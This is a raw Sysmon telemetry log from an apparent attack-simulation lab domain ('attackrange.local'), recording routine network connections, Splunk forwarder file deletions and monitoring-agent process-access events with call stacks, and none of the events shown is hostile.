AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local64912- 354300x800000000000000039630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.702{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56217-false10.0.1.12-8000- 354300x800000000000000039629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.477{00000000-0000-0000-0000-000000000000}6996<unknown process>-tcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56216-false34.120.208.123123.208.120.34.bc.googleusercontent.com443https 23542300x800000000000000039628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.358{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F39CA3E34E48BAF6E8852FAEF27945A1,SHA256=173A4E9949F2C75E47313A7F03EE36C197269DC906E85D8C33AC8830D650A3E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.339{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.339{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.336{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.336{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.336{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.336{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000039621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.151{FE4C2B44-D9F5-63C7-1600-00000000AF02}12963348C:\Windows\system32\svchost.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.151{FE4C2B44-D9F5-63C7-1600-00000000AF02}12961340C:\Windows\system32\svchost.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6154|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039619Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.136{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+3f936|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000039618Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.120{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6ce4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039617Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.120{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000039616Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:48.120{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\KERNEL32.DLL+1d39f|c:\windows\system32\rpcss.dll+25579|c:\windows\system32\rpcss.dll+3fd82|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+5518b|C:\Windows\System32\RPCRT4.dll+5386a|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000015069Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:49.302{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D250D78BAA5CB8435361473018D6E56F,SHA256=29FB46D82ABC2B926ACE32C75C1AA16C2910E2A3F6D776D1BE460602F164238E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000039633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:45.774{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-64912- 23542300x800000000000000039632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:49.417{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9E5E7B5DE2638D2E144BD916E5E10F5,SHA256=0DD598EE3190F3AED92ACC24079834609E2A3F8C2F20F4052FF5DE374E0BA00D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015070Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:50.397{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11A199904295C893A775DF2892203E91,SHA256=49F14927DDFFC58F0435FE0E8E4AA1E9B751AC55EF51ACD84CDB937AE427199A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:50.520{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E25605C387A5679E91A72D67A8C378AB,SHA256=943F69EF01FEA1811327E73F7237CD5206F854F44B47B40A61F4BC0D18CB6224,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:50.114{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000039635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:50.114{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 10341000x800000000000000039634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:50.114{FE4C2B44-DE08-63C7-F104-00000000AF02}60685140C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E330-63C7-FD05-00000000AF02}4216C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013038850) 23542300x800000000000000015071Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:16:51.481{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06056057B221E517425E0F19C798B9A4,SHA256=0B56C386EC66AF90B8879BA2170BF5F1A994E09419623373F5EEB3162B4CCBD7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000039669Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.936{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039668Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.934{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039667Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.928{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039666Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.927{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039665Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.923{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039664Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.905{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039663Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.899{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039662Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.894{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039661Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.891{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039660Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.889{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039659Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.887{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039658Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:16:51.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program 